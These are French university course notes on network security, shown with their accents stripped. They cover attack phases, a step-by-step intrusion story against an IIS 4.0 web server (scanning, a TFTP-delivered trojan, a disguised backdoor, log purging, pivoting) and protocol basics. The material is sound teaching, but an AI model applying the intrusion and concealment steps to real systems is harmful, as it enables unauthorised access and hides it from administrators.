Вы находитесь на странице: 1из 131

..

..
..
..
..

Jean-Christophe GALLARD
V 2.0 - Octobre 2005

CNAM

Scurit et Rseaux
.

CNAM Jean-Christophe GALLARD

Table des matires


HISTORIQUE .......................................................................................................................................... 5
AVANT 1980 .......................................................................................................................................... 5
LES ANNEES 1980.................................................................................................................................. 6
DEPUIS 1990 ......................................................................................................................................... 7
LE CLIENT / SERVEUR............................................................................................................................. 8
PROBLEMATIQUE DES ENTREPRISES ........................................................................................................ 8
LES RISQUES, LES ATTAQUES........................................................................................................... 9
LES ATTAQUES ....................................................................................................................................... 9
SCENARIO DUNE INTRUSION ................................................................................................................. 10
EXEMPLE DE SCENARIO DINTRUSION..................................................................................................... 12
RAPPELS SUR LES PROTOCOLES DE TRANSMISSION................................................................ 15
DEFINITIONS ........................................................................................................................................ 15
FONCTIONS DES PROTOCOLES DE NIVEAU 2........................................................................................... 16
FONCTIONS DES PROTOCOLES 2 A 7...................................................................................................... 18
ADRESSAGE, ANNUAIRE ET ROUTAGE .................................................................................................... 20
PROTOCOLES TCP / IP....................................................................................................................... 23
PREAMBULE ......................................................................................................................................... 23
ARCHITECTURE DES PROTOCOLES TCP / IP .......................................................................................... 24
LE PROTOCOLE ETHERNET ................................................................................................................... 24
LES PROTOCOLES ARP / RARP ........................................................................................................... 25
LE PROTOCOLE IP ................................................................................................................................ 26
LE PROTOCOLE ICMP .......................................................................................................................... 30
LES PROTOCOLES DE ROUTAGE ............................................................................................................ 31
LE PROTOCOLE TCP ............................................................................................................................ 33
ETABLISSEMENT DUNE SESSION TCP ................................................................................................... 36
LE PROTOCOLE UDP............................................................................................................................ 38
LES SERVICES ...................................................................................................................................... 39
VULNERABILITES DE TCP / IP........................................................................................................... 41
CARACTERISTIQUES DE SECURITE DE TCP / IP ...................................................................................... 41
CAS DU PROTOCOLE UDP .................................................................................................................... 41
TECHNIQUES DE RECENSEMENT RESEAU ............................................................................................... 41
EXEMPLES DE VULNERABILITES DES PROTOCOLES TCP / IP ................................................................... 51
VULNERABILITES DES APPLICATIONS ........................................................................................... 57
LE DNS............................................................................................................................................... 57
LA MESSAGERIE SMTP ........................................................................................................................ 57
LE PROTOCOLE FTP............................................................................................................................. 58
LES SERVICES INTERACTIFS .................................................................................................................. 59
X W INDOW ........................................................................................................................................... 59
LE PROTOCOLE HTTP .......................................................................................................................... 59
LA VOIX SUR IP .................................................................................................................................... 59
PROTOCOLES DE SECURITE ............................................................................................................ 61
PREAMBULE ......................................................................................................................................... 61
PPP, L2F, PPTP ET L2TP................................................................................................................... 61
LE COURANT PORTEUR EN LIGNE ........................................................................................................... 63
PROTOCOLES POUR LIAISONS SANS FIL.................................................................................................. 64
IPSEC ................................................................................................................................................ 66
IPV6 ................................................................................................................................................... 70
3

CNAM Jean-Christophe GALLARD

SSL - TLS ........................................................................................................................................... 71


RADIUS ................................................................................................................................................ 73
KERBEROS........................................................................................................................................... 74
SECURITE DES MATERIELS DE RESEAUX...................................................................................... 79
VUE DENSEMBLE ................................................................................................................................. 79
LES CHASSIS ........................................................................................................................................ 79
LES PONTS........................................................................................................................................... 80
LES CONCENTRATEURS ........................................................................................................................ 81
LES COMMUTATEURS ............................................................................................................................ 82
LES ROUTEURS FILTRANTS .................................................................................................................... 86
MECANISMES COMPLEMENTAIRES ................................................................................................ 89
LA TRANSLATION DADRESSE (NAT)...................................................................................................... 89
LE FILTRAGE DANS LES ROUTEURS DACCES .......................................................................................... 92
LE TUNNELLING IP (VPN)..................................................................................................................... 93
LES FIREWALLS.................................................................................................................................. 95
DEFINITION .......................................................................................................................................... 95
TYPES DE FIREWALL ............................................................................................................................. 95
FILTRAGE COUCHE BASSE ..................................................................................................................... 96
FILTRAGE APPLICATIF ........................................................................................................................... 96
LE STATEFULL INSPECTION OU FILTRAGE A ETAT ........................................................................ 98
GESTION DE LA FRAGMENTATION........................................................................................................... 98
LES LIMITES DU FILTRAGE RESEAU ............................................................................................. 100
GENERALITES .................................................................................................................................... 100
REGLES DE FILTRAGE TROP LAXISTES.................................................................................................. 100
ORDONNANCEMENT DES REGLES DE FILTRAGE ; FIRST MATCH ........................................................ 101
CANAUX CACHES TCP........................................................................................................................ 102
RE ACHEMINEMENT DE PORTS ............................................................................................................. 103
GESTION DE LA FRAGMENTATION......................................................................................................... 105
PROTOCOLES A PORTS NEGOCIES ....................................................................................................... 105
CANAUX CACHES APPLICATIFS ............................................................................................................ 106
INTERCONNEXION DES RESEAUX ................................................................................................. 107
PREAMBULE ....................................................................................................................................... 107
ROUTEURS OU FIREWALLS ?............................................................................................................... 108
LAUTHENTIFICATION .......................................................................................................................... 109
LANALYSE DE CONTENU ET LA DECONTAMINATION VIRALE .................................................................... 109
LA DETECTION DINTRUSION ................................................................................................................ 110
PRINCIPE DE LA ZONE DEMILITARISEE (DMZ) ....................................................................................... 111
ARCHITECTURES TYPES ...................................................................................................................... 112
CONCLUSIONS .................................................................................................................................. 119

!
"
#

&'()"

Avant 1980
Linformatique est apparue rcemment si on la mesure laune de lvolution
technologique humaine : mme si les concepts originaux de nos ordinateurs modernes
prennent racine dans les travaux de Pascal, Babbage et de la comtesse Ada Lovelace, la
technologie des semi-conducteurs, qui permit lavance du numrique, ne remonte quaux
1
annes 1950-1960 . Les systmes informatiques davant les annes 1980 consistaient
surtout en des calculateurs centraux, lourds, chers et dvolus des tches de calculs
complexes et rptitifs.
Si ces dernires annes nous ont habitus utiliser les ordinateurs et les rseaux dans
nos tches quotidiennes, les systmes dil y a vingt ou trente ans ignoraient pour leur
grande majorit les notions de communications distantes.

Les ordinateurs davant la seconde guerre mondiale ntaient pas des ordinateurs au sens
auxquels nous lentendons aujourdhui : il sagissait avant tout de systmes analogiques, donc
soumis une certaine marge dincertitude quant aux rsultats obtenus. A ce titre, les fameux ENIAC
et UNIVAC, considrs comme les anctres directs de nos ordinateurs, ne peuvent tre classs
dans la catgorie des ordinateurs stricto-sensu puisque rpondant des concepts et une
technologie radicalement diffrents.
5

CNAM Jean-Christophe GALLARD

Vue partielle de lENIAC


A cette poque, donc, les architectures de systmes dinformations se trouvaient
centraliss sur de gros calculateurs (les mainframes ). A ce titre, les interfaces
utilisateurs fonctionnaient surtout en mode caractres , dans le meilleur des cas, les
protocoles rseaux, lorsquils existaient, taient propritaires et les trafics rseaux peu
volumineux.

LUnivac
Ces architectures centralises imposaient alors une structuration importante des
programmes alors qu linverse les donnes, totalement matrises par ces mainframes,
pouvaient tre stockes dans des bases de donnes peu structures (gnralement des
fichiers plat ).

Les annes 1980


Les annes 1970-1980 virent lapparition des premiers mini-ordinateurs , prcurseurs
de ce qui deviendrait la fin des annes 1980 la micro-informatique. Des annes de
centralisation des systmes informatiques montrrent les limites, la fois financires et
pratiques, de telles architectures. Il devint alors ncessaire de sorienter vers des
systmes moins monolithiques, moins onreux, et plus autonomes.
Les systmes UNIX, mens et soutenus par des constructeurs comme Sun et Hewlett
Packard, devinrent la tte de pont de cette rvolution annonce. Peu peu, les systmes
informatiques durent se mettre au rgime, ces nouvelles gnrations dordinateurs
devenant moins exigeantes en ressources tout en devenant de plus en plus puissants.
La contrepartie de cette rduction des cots dachat et de possession ne tarda pas se
faire connatre, pousse par un besoin croissant des utilisateurs schanger des
6

CNAM Jean-Christophe GALLARD

informations : les systmes dinformation devaient communiquer entre eux et sortir de leur
isolement. Les annes 80 virent donc une pousse trs importante de la notion de
rseau , et lInternet, pourtant dj g dune quinzaine dannes (les dbuts de
lInternet remontant 1970) commena son irrsistible ascension pour finalement
simposer comme un standard.
Cest donc la mini-informatique qui permit lmergence de la micro-informatique laquelle
curieusement les grandes entreprises du domaine, IBM en tte, ne croyaient pas :
systmes plus lgers, interfaces utilisateurs graphiques plus conviviales, confort et
autonomie pour lutilisateur.
De petites socits en profitrent alors pour se ruer sur ces domaines alors en friche :
Apple, sous limpulsion des laboratoires XEROX, rvolutionna les IHMs en crant le
Macintosh, aprs un coup dessai prometteur (lApple II). Un jeune tudiant de Redmond
nomm Bill Gates, cra avec son ami Paul Allen la socit Microsoft en profitant dune
plate-forme matrielle invente par la socit IBM, le PC.

Le premier IBM PC

LApple IIe

Le Macintosh

Cependant, le concept de rseau restait confin aux milieux scientifiques qui


rinventrent le rseau local sous limpulsion du systme dexploitation invent par
Kernighan et Ritchie au dbut des annes 70 : le systme UNIX.

Kernighan et Ritchie, dveloppant le systme Unix sur un PDP11


Paralllement cette rvolution annonce, les donnes traites durent se structurer
davantage pour rpondre des besoins dchanges de plus en plus croissants. Les
premires bases de donnes relationnelles apparurent alors.

Depuis 1990
Ds cet instant, tous les lments taient runis pour cette (r)volution que, pourtant,
personne navait prvues. Le dbut des annes 1990 vit alors lexplosion de la microinformatique et des rseaux locaux.
7

CNAM Jean-Christophe GALLARD

Les besoins dchanges croissant de faon exponentielle, les standards ouverts de


lInternet simposrent alors tout naturellement comme LES moyens dchanges de
donnes : la suite protocolaire TCP/IP, bien que peu prise par les ingnieurs en
tlcommunications dalors, en raison de ses limitations et de sa trop grande simplicit,
simposa comme standard de fait.
Il peut apparatre trange quun tel protocole ait eu un succs aussi inattendu : alors que
dans les autres rseaux classiques (X25 en tte) lintelligence et les services taient
places dans linfrastructure des rseaux, la suite TCP/IP se caractrise par le fait que ce
sont les quipements terminaux qui assurent la cohrence du systme. Il nexiste pas
dans TCP/IP de notion de garantie de remise et de dlai dacheminement des donnes, ni
mme de rservation de bande passante comme en tlphonie classique, et ce sont les
quipements terminaux qui assurent la mise en place de la plupart des valeurs des
champs protocolaires (adresses sources, options, etc.).
Devant le vide laiss bant par les constructeurs, les utilisateurs / dveloppeurs,
essentiellement les milieux scientifiques, se reportrent alors sur ce standard, certes peu
volu et trs (trop ?) simple mais qui rpondait parfaitement leur besoin : TCP / IP.
Ds lors, les changes de donnes aux travers de rseaux informatiques se
gnralisrent, lInternet connut le succs phnomnal que lon sait et larchitecture des
systmes volua afin doptimiser la rpartition des traitements et laccs aux donnes :
dune architecture centralise, on passa une architecture distribue.

Le Client / Serveur
Lapparition du client / serveur correspond ce passage dune architecture centralise
une architecture distribue. Impose par cette rvolution technologique, ce concept a
alors accompagn le passage de solutions propritaires monolithiques des solutions
intgrant des produits sur tagre sappuyant sur des standards ouverts .
Cest ainsi que de nombreux calculateurs centraux disparurent au profit de serveurs
dpartementaux disposant de ressources moindres, une partie des traitements tant alors
reporte sur le poste utilisateur. Cest ce moment quapparurent les premiers problmes
majeurs de scurit informatique.

Problmatique des entreprises


Depuis 1995, lexplosion de lInternet pousse les entreprises se doter dun portail
publicitaire, voire mettre en uvre des solutions de e-commerce. La mondialisation et la
dcentralisation leur ont galement impos dinterconnecter leurs agences entre elles
(Intranet) et douvrir leurs systmes dinformation leurs clients (Extranet), et ce au
travers de rseaux publics quelles ne matrisent pas.
Dans ce contexte, les entreprises ont alors la ncessit de scuriser leurs changes
informatiques, et ce dans un monde ouvert .
La problmatique des entreprises revt alors un caractre double : alors que les
technologies sur tagre se banalisent dans les systmes dinformation (ce qui mne
fatalement une moins bonne matrise du systme dinformation), la ncessit de mieux
contrler les cots et les besoins dinterconnexion font basculer les systmes vers le
monde IP et les technologies de lInternet.
Ds lors, la scurit des systmes dinformations des entreprises devient un impratif
pour changer des informations entre entits.

#
!*
"
+

Les attaques
Tout ordinateur connect un rseau informatique est potentiellement vulnrable une
attaque.
Une attaque est l'
exploitation d'
une faille d'
un systme informatique (systme
d'
exploitation, logiciel, erreur de configuration, etc.) des fins non connues par l'
exploitant
du systme et gnralement prjudiciables.
Sur lInternet, des attaques ont lieu en permanence, raison de plusieurs attaques par
minute sur chaque machine connecte. Ces attaques sont pour la plupart lances
automatiquement partir de machines infectes (par des virus, chevaux de Troie, vers,
etc.), l'
insu de leur propritaire. Plus rarement il s'
agit de l'
action de pirates
informatiques.
On peut classiquement dfinir deux grands types dattaque sur les rseaux : les
attaques sur les protocoles de communications, dune part, et les attaques sur les
applications standards, dautre part.
Les attaques sur les protocoles de communications consistent pour un agresseur
profiter des failles des protocoles de communications (IP, ICMP, TCP et UDP pour
lessentiel). Lautre volet bnficie des vulnrabilits des applications classiques mises en
uvre dans les Intranets et les Extranets (HTTP, SMTP, FTP).
On peut galement distinguer les attaques sur linformation elle-mme des attaques sur
les systmes dinformations.
Alors que dans le premier cas on sattache atteindre en intgrit / disponibilit /
confidentialit aux donnes traites par les systmes (par le biais de virus, dcoute
rseau, de modifications de donnes), le second cas de figure vise se mnager une
porte dentre dans les systmes traitant les donnes (vols de mots de passe, excution
de processus non autoriss, accs illicites aux composants du systme dexploitation).

CNAM Jean-Christophe GALLARD

Scnario dune intrusion


Un scnario dintrusion sur un systme peut se dcomposer en six actions lmentaires,
enchanes selon un processus itratif :
renseignement

prparation

intrusion

installation

camouflage

propagation

dcouvrir l'
architecture du systme, son plan d'
adressage
coute, furetage, espionnage, cryptanalyse
dgrader ou contourner la scurit
leurrage, sabotage, bombe logique, parasitage, saturation
entrer par un point faible
usurpation de nom, d'adresse, cheval de Troie, essais
exhaustifs
installer une entre permanente
porte drobe, canal cach
cacher l'
entre permanente
cacher les rpertoires et fichiers pirates, inhiber la
surveillance
attaquer les machines ou systmes en mutuelle confiance
rebond IP ou X25, rhosts, domaines WinNT, virus, ver

Renseignement
Il sagit ici de la phase pralable toute attaque informatique. Dans tout
scnario dintrusion, lidentification prcise de la cible est un pr-requis
indispensable la bonne conduite des agressions venir.
Le futur agresseur aura donc cur didentifier le plus prcisment
possible les lments matriels et logiques participant au systme
dinformation. Ces investigations peuvent tre mises en uvre passivement au travers de
sources ouvertes (sites Internet, presse, plaquettes de prsentations) puis compltes
par des investigations plus actives allant de la simple coute dun rseau lespionnage
2
industriel pur et simple, en passant par des techniques de trashing , de dtections de
services (port scanning) et de dtections de systmes dexploitation (OS fingerprinting).

Prparation

La phase de prparation est distinguer de celle du renseignement dans la mesure o il


est surtout ici question de soutiller correctement au vu des rsultats des investigations
prcdentes. Le ciblage pralable permet alors de rentrer dans une logique dadaptation
active, o lagresseur slectionnera les actions futures qui ont le plus de chances
daboutir une intrusion sur le systme considr.
Si, dans la phase de renseignement, lagresseur aura pu reprer la prsence de certains
services pouvant potentiellement prsenter des vulnrabilits (serveurs HTTP, accs de
maintenance, quipements de rseau obsoltes, messagerie connue pour ses
nombreuses vulnrabilits, etc.) ce dernier ira donc chercher tout ce quil peut collecter
sur les vulnrabilits de ses services. Il est souvent aid en cela par les moteurs de
recherches de lInternet et par les sites spcialiss dans ce domaine.
2

Trashing : littralement (et trs concrtement) fouille des poubelles ! Egalement appel dumpster
diving .
10

CNAM Jean-Christophe GALLARD

Intrusion

Il sagit ici de la partie la plus active , au cours de laquelle lagresseur


met en uvre de manire effective les attaques pouvant potentiellement
mener la compromission du systme vis. Les techniques utilises ici
sont plthoriques et dpendent trs troitement du systme cible, do
limportance de renseignements les plus prcis possibles en phases
initiales.

Parmi les techniques les plus couramment utilises, on peut cependant citer :

Utilisation de bugs dans les services rseaux (buffer overflow, contrles de


scurit inoprants),
Exploitation dune mauvaise configuration des systmes (comptes sans mot de
passe, systmes dverrouills parce que a marche mieux comme a , ),
Branchement physique pirate sur une infrastructure de communication,
Utilisation des particularits des protocoles rseaux (usurpation dadresse et / ou
didentit).

Lorsque la phase dintrusion est couronne de succs, le processus devient alors itratif
ds ce stade : un attaquant stant introduit sur un systme essayera alors de complter
ses renseignements initiaux en vue de dcouvrir dautres failles exploitables et qui
ntaient pas ncessairement visibles de lextrieur du systme (systmes de fichiers mal
scuriss, comptes avec mots de passe triviaux).

Installation

Suite une intrusion russie, un agresseur tentera alors de mettre en place dans le
systme un ensemble de mcanismes lui assurant une entre permanente. Une attaque
suivant souvent un chemin long et fastidieux drouler, il est en effet tentant dinstaller
une porte drobe, permettant de revenir sur sa cible sans avoir suivre nouveau ce
chemin tortueux. En outre, une faille pouvant tre exploite un instant donn peut avoir
t corrige lorsque lagresseur reviendra sur sa cible.
Les techniques utilises ici sont varies et plus ou moins discrtes : ajout dun compte
illicite, altration du filtrage rseau, service additionnel, shell distant, serveur FTP pirate,
cheval de Troie volu

Camouflage

par exemple)

Le principe de ce stade consiste camoufler ses actions sur


le systme afin de les dissimuler aux administrateurs
systmes : il est souvent troitement li la phase
dinstallation (les deux phases sont par ailleurs souvent
confondues) : fichiers et rpertoires cachs, utilisation de
noms de programmes anodins pour cacher ses portes
drobes, stockages hors norme, effacement et inhibition des
journaux daudit, altration des commandes systmes (ps, ls

Dans le monde UNIX, cette phase de camouflage est souvent mise en uvre au travers
de rootkits (traduction littrale kits pour devenir le root ). Le monde Windows NT a
longtemps t pargn par ces techniques de camouflages sophistiqus, et ce en raison
mme de son architecture interne, mais cette priode est dsormais rvolue : le premier
rootkit fonctionnel pour Windows (le fameux ntrootkit) a t distribu au cours de lanne
2000.

11

CNAM Jean-Christophe GALLARD

Propagation

Lintrusion dans un systme demeure souvent ralise de faon unitaire, systme par
systme. Il est en effet assez rare quun agresseur parvienne pntrer un systme
dinformation dans son ensemble ds le dbut de son attaque : le plus souvent, lintrusion
sera ralise sur une machine particulirement vulnrable (serveur Web en DMZ, serveur
de messagerie, routeur daccs) mais lensemble du systme dinformation ne lui sera
alors pas ncessairement accessible.
Dans ce cas de figure, un agresseur tentera alors de propager son intrusion dautres
lments du systme dinformation, jusquici inaccessibles. Cette propagation peut
galement intervenir sur dautres systmes distants, le premier site compromis devenant
alors un site de rebond pour des attaques ultrieures. Cest de cette manire quun pirate
informatique allemand a procd, en 1988, pour atteindre les machines de luniversit de
Berkeley : lauteur de ces attaques nutilisait pas moins de six rebonds successifs pour
attaquer ces systmes, comme le dcrit Clifford Stoll dans le nid du coucou .

Exemple de scnario dintrusion


Dans lexemple qui suit, nous supposerons quun agresseur dcide de sattaquer un
serveur Web dune entreprise sur lInternet.
Larchitecture du systme de publication Web est la suivante :

Le serveur Web est un systme Windows 2000 utilisant le service Web IIS (Internet
Information Service) de Microsoft en version 4.0. Ce dernier est protg de lInternet par
un Firewall dont les rgles de filtrage :

autorisent le trafic HTTP (port 80) de lInternet vers le serveur Web,


autorisent le trafic SMTP (port 25) de lInternet vers le serveur Web (il sagit ici
dune erreur de configuration, le serveur nest pas cens hberger un service de
messagerie),
autorisent tout trafic du serveur vers lInternet,
Interdisent tout le reste.

Renseignement

Par navigation sur lInternet, lagresseur repre un lien sur un site vers notre serveur. Il
dispose alors de son adresse (ou du moins de son nom, ce qui revient au mme).
3

Lagresseur ralise alors un port scanning laide dun outil comme nmap, en
activant loption de dtection de systme dexploitation.
Nmap lui indique alors :

Opration visant dterminer les services accessibles sur la machine cible.


12

CNAM Jean-Christophe GALLARD

Que seul le port 80 est ouvert (donc quil existe un serveur Web),
Que la machine cible est une machine sous Windows (rsultat de la dtection de
systme dexploitation),
Que le port 25 nest pas filtr.

En poursuivant ses investigations, il repre que le service Web est un service IIS en
version 4.0 (par exemple par analyse des bannires HTTP lors dune connexion sur ce
service).

Prparation

Durant cette phase, lagresseur va alors rcuprer un maximum dinformations sur les
vulnrabilits des serveurs sous IIS 4.0 en se connectant des sites spcialiss. En
particulier, il repre une vulnrabilit majeure lui permettant de lancer une commande
distance en utilisant un simple navigateur et une URL un peu particulire.
Il en profite galement pour rcuprer un programme cheval de Troie permettant
dobtenir une invite de commande distance sur la cible et coutant sur le port 25.

Intrusion

A laide de son navigateur, lagresseur tente une connexion HTTP avec lURL particulire
en question, et en tentant de lister le contenu du rpertoire C:\WINNT :

Le rsultat de cette action saffiche dans la fentre de son navigateur, lui indiquant que la
vulnrabilit est exploitable sur ce systme.
Aprs avoir cr un serveur TFTP sur sa propre machine et avoir dpos dans
larborescence TFTP le fichier Troie.exe, il provoque le tlchargement de ce fichier sur le
serveur Web en lanant une commande tftp sur le serveur :

La copie stant correctement passe, il lance alors de la mme manire son cheval de
Troie sur le serveur, puis se connecte avec Telnet sur le port 25 de la victime et obtient
alors une invite de commande distante.

Notons que, ds prsent, lattaquant tout loisir dinspecter plus finement sa cible
puisque quil se trouve dsormais dans la place : il pourra ainsi repartir sur une phase de
renseignement afin par exemple de dtecter dautres ventuelles vulnrabilits.

13

CNAM Jean-Christophe GALLARD

Installation

La procdure suivie au pralable tant longue, lagresseur rapatrie des outils plus
sophistiqus sur le serveur victime de lintrusion et installe ainsi une porte drobe
permanente qui lui vitera de devoir passer par la suite par le service Web pour
sintroduire sur le serveur.

Camouflage

Lentre permanente est stocke dans larborescence systme, sous un nom anodin et
lapparence indispensable au fonctionnement du systme (lsasrvsys32.exe par exemple).
Les journaux dvnements du systme sont galement purgs.

Propagation

Ds cet instant, lattaquant peut alors utiliser cette machine corrompue comme systme
de rebond, soit pour atteindre des machines situes derrire le Firewall, mais jusquici
inaccessibles, soit pour attaquer dautres sites Internet.

14

. !

Dfinitions
Un protocole est une convention de communication entre 2 quipements informatiques ou
tlcoms. Cette convention comprend au minimum :

Une structure et un codage des informations changes,


Des procdures d'
change.

A un protocole est gnralement associ un service, propos aux applications qui


utilisent le protocole, service qui se traduit par une interface programmatique (en anglais
API ; Application Programming Interface).
Pour fonctionner, un protocole peut utiliser les services d'
un protocole de niveau plus bas.
On dit que le protocole de niveau haut est imbriqu, ou encapsul dans le protocole de
niveau bas. Les protocoles de niveau bas sont associs aux technologies de
transmission, tandis que les protocoles de niveau haut sont associs aux applications
informatiques.
Il est possible d'
empiler plusieurs niveaux de protocole: on parle alors de pile de
protocoles (stack en anglais).
Dans le cas de la plupart des protocoles synchrones actuels, les informations sont
transmises sous forme de groupes d'
octets appels trame ou paquet (en anglais frame
ou packet).
Le mot trame est plutt employ pour les protocoles de niveau transmission (niveau 2
par exemple ; trame Ethernet), le mot paquet pour les protocoles de niveau routage
(niveau 3 par exemple paquet IP). Pour les protocoles de niveau 4, on parlera alors plus
volontiers de segment (par exemple ; segment TCP).
La longueur d'
une trame ou d'
un paquet est lie aux caractristiques des supports et
quipements de rseaux (notamment la taille des zones mmoire d'
change), et va de
quelques octets quelques kilooctets.
Au niveau des applications, le concept de paquet fait place au concept de message ou
transaction. La taille d'
un message ou d'
une transaction possde une variabilit
beaucoup plus grande que celle des trames ou paquets: de quelques octets plusieurs
Mgaoctets.

15

CNAM Jean-Christophe GALLARD

Fonctions des protocoles de niveau 2


Protocoles synchrones et asynchrones

Un protocole asynchrone fonctionne par transmissions d'


octets indpendants les uns des
autres. Le plus souvent, ces octets sont des caractres ASCII (ou EBCDIC). Chaque octet
est prcd et suivi par des bits de synchronisation, ce qui optimise mal les liaisons.
Des caractres spciaux, non imprimables, ont des rles particuliers. Par exemple: STX,
ETX, STH, ETH: dbut et fin de texte ou d'
entte de texte, XOFF, XON: arrt et reprise de
la transmission en sens inverse (contrle de flux), BREAK (pseudo caractre): interruption
de la transmission en sens inverse.
Les protocoles asynchrones ne sont plus gure utiliss. Quelques uns des plus connus: le
Tlex, les terminaux ASCII de type VT100, le Minitel, certains protocoles vhiculant IP
(SLIP, CSLIP).
Un protocole synchrone fonctionne par transmission de plusieurs octets groups sous
forme de trame. Il existe 2 catgories de protocoles synchrones:

protocole synchrone caractre: exemple le BSC (binary synchronous protocol),


protocole synchrone bit: c'
est le cas de la quasi totalit des protocoles de niveau
2 actuels.

La suite du texte ne concerne que les protocoles synchrones bit, sauf mention contraire.

Modes point--point, multipoint, point multipoint

Les protocoles de niveau 3 7 sont toujours des protocoles point--point, c'


est dire ne
mettant en communication que 2 machines la fois. Le cas de la diffusion est un cas
part, qui peut se ramener un ensemble de communications point point.

Dlimitation de trame et transparence

Au niveau 1, le concept de trame ou paquet n'


existe pas, seul existe le concept de bit. Sur
une ligne de transmission, un bit ne peut tre qu'
0 ou 1, il n'
existe pas de concept de
prsence ou absence d'
information. Gnralement, quand il ne passe pas d'
information
sur une ligne, les bits sont en permanence 1.
Les protocoles de niveau 2 ont pour fonction importante de dfinir la diffrence entre la
prsence et l'
absence d'
information, en relation avec la dfinition d'
une trame. Une trame
se dfinit comme un groupe de bits significatifs, avec un dbut et une fin, de longueur
fixe ou variable selon les protocoles. Entre 2 trames, les bits sont non significatifs.
Pour marquer le dbut et la fin d'
une trame, le protocole de niveau 2 utilise des
configurations binaires spciales appeles dlimiteurs ou fanion (en anglais flag).
Le protocole BSC (binary synchronous communication) utilisait dans les annes 70 des
valeurs particulires d'
octets ASCII: STX (start of text) et ETX (end of text). Ces valeurs
16

CNAM Jean-Christophe GALLARD

ne devaient videmment pas se retrouver dans le texte, sinon la trame se terminait


prmaturment.
Dans le cas LAP et Ethernet, le dlimiteur de fin ne doit pas se trouver dans les octets
transmettre, sous peine d'
interruption prmature de la trame. Le mcanisme de
transparence a pour but de modifier ces octets, en ajoutant des bits dans les octets
ayant une mauvaise configuration.
Le protocole TokenRing, utilisant les tats de repos de la modulation, n'
a pas besoin de
ce mcanisme, mais est li un type de modulation. Le protocole ATM, dont les trames
sont de longueur fixe 53 octets, n'
a besoin ni de dlimiteur de fin ni de transparence.

Dtection derreur et collision, CRC

Les erreurs de transmission sont frquentes sur toutes les lignes. Le taux d'
erreur peut
varier, selon le type de ligne LAN ou WAN, la longueur, la qualit et l'
environnement, de
-4
-9
10 (pour la paire tlphonique classique) 10 (pour des liaisons en fibre optique) De
plus, dans le cas du protocole Ethernet, les erreurs peuvent tre dues des collisions de
trame, c'
est dire l'
mission simultane de 2 trames ou plus par plusieurs stations.
La dtection d'
erreur est alors gnralement assure par la transmission d'
une
information redondante pour chaque trame, gnralement place en fin de trame.

Les protocoles anciens calculaient une redondance appele checksum, par addition
logique de tous les octets transmis.
Dans les protocoles actuels, le calcul de la redondance se fait en considrant la trame
comme un polynme binaire, et en divisant ce polynme par un polynme dit gnrateur.
Le reste de la division constitue la redondance (le quotient est inutile), et il est appel
CRC (cyclic redundancy checking). Le mot cyclique vient de l'
aspect polynomial de la
division.
Une suite de bits transmettre u1, u2,uk est considre comme un polynme M(x) =
k-1
k-2
u1x + u2x + + uk.
9

Par exemple 1101011011 est reprsent par x + x + x + x + x + x + 1.


r

l'
mission, on calcule la division du polynme M multipli par x , par le polynme
gnrateur G de degr r. On appelle Q le polynme quotient et R le polynme reste de
r
cette division, on a donc : x M(x) = Q(x).G(x) + R(x).
La suite de bits correspondant au polynme R constitue le CRC qui est ajout
l'
information transmettre.
4

Par exemple, l'


aide du polynme gnrateur G(x) = x +x+1, la suite 1101011011
sera transmise accompagne du CRC 1110 car
4

x M(x) = x

13

+x

12

+x

10

+ x + x + x + x = (x + x + x + x)(x + x + 1) + x + x + x

Le polynme gnrateur est choisi pour permettre la dtection coup sr des erreurs
simples (un seul bit erron dans la trame), et des groupes d'
erreurs de longueur infrieure
la taille de la redondance. Ces 2 types d'
erreurs sont en effet les plus couramment
rencontrs sur les lignes de transmission (un groupe d'
erreurs correspond un parasite).
Avec 16 bits de CRC, le taux d'
erreur est divis par 65536. Avec 32 bits il est divis par 4
milliards. Dans le cas du protocole Ethernet fonctionnant sur une fibre optique, dont le
17

CNAM Jean-Christophe GALLARD


-9

-18

taux d'
erreur brut est de 10 , le taux d'
erreur rsiduel est donc d'
environ 10 , soit 1 bit
erron sur 1 milliard de milliards de bits transmis.

Fonctions des protocoles 2 7


Mode datagramme ou connect

Les protocoles de niveau 3 et 4 peuvent fonctionner selon 2 modes:


Un mode lmentaire appel datagramme ou sans connexion, c'
est dire sans gestion
de communication. Les paquets sont transmis indpendamment les uns des autres, et
peuvent arriver dans le dsordre, arriver plusieurs fois, ou ne pas arriver du tout. Il n'
y a ni
contrle d'
erreur, ni contrle de flux. Exemples: IP, UDP, ISO CLNP (connection less
network protocol).
Un mode volu appel mode connect, c'
est dire avec gestion de communication. Il
existe des paquets spciaux d'
ouverture et de fermeture de communication (et de
rinitialisation). A l'
intrieur d'
une communication, il est possible d'
assurer des services
divers: dtection et correction d'
erreur, contrle de flux, etc. Exemples: X25, TCP, ISO
CONP (connection oriented network protocol).

Correction derreur

Les protocoles de niveau 2 possdent un mcanisme de dtection d'


erreur prsent plus
haut. Les protocoles de niveau 3 et 4 (rarement de niveau suprieur) peuvent galement
dtecter des erreurs: numrotation de paquets non squentielle, incohrence dans les
enttes de paquet.

Mcanismes de correction d'


erreur pour les rseaux tendus

Sur de longues distances, la probabilit de perte de paquets ou de modifications


involontaires sur le rseau nest pas ngligeable. Afin de rsoudre ce problme, les
protocoles de communication utilisent des mcanismes dacquittement des messages
associs des rmissions en cas derreur dtecte.

Anticipation

Dans le mcanisme d'


acquittement dcrit plus haut, l'
metteur attend l'
acquittement avant
d'
envoyer un nouveau paquet. Il s'
ensuit un fonctionnement de la liaison l'
alternat, donc
avec une mauvaise utilisation de la capacit de transmission (qui est gnralement full
duplex).
Pour optimiser la transmission, l'
metteur fait l'
hypothse favorable que le paquet est bien
reu, et envoie le suivant immdiatement. C'
est l'
anticipation. Il est possible d'
envoyer
plusieurs paquets en anticipation. En cas d'
erreur, il faudra renvoyer tous les paquets
errons, mais ce cas est rare.
La fentre d'
anticipation est le nombre maximal de paquets qu'
on peut envoyer avant
d'
avoir reu l'
acquittement du premier. Dans le cas LAP et X25, les fentres d'
anticipation
18

CNAM Jean-Christophe GALLARD

ont une longueur maximale de 7 (en numrotation modulo 8), et sont gnralement
configures cette valeur. Dans le cas TCP, la fentre est code sur 16 bits, et est
adapte dynamiquement.

Contrle de Flux

Afin d'
viter l'
engorgement du canal de transmission, du rseau, et des mmoires des
quipements intermdiaires de commutation, il est ncessaire d'
asservir le dbit
d'
mission la capacit d'
absorption du rcepteur. Le contrle de flux assure cette
fonction.
Il fonctionne selon 2 schmas complmentaires:

Contrle par interdiction: le rcepteur rgule l'


metteur par des commandes
stop encore .
Contrle par autorisation: le rcepteur met des autorisations d'
mission, qui
peuvent tre groupes avec les accuss de rception, avec une fentre
d'
anticipation.

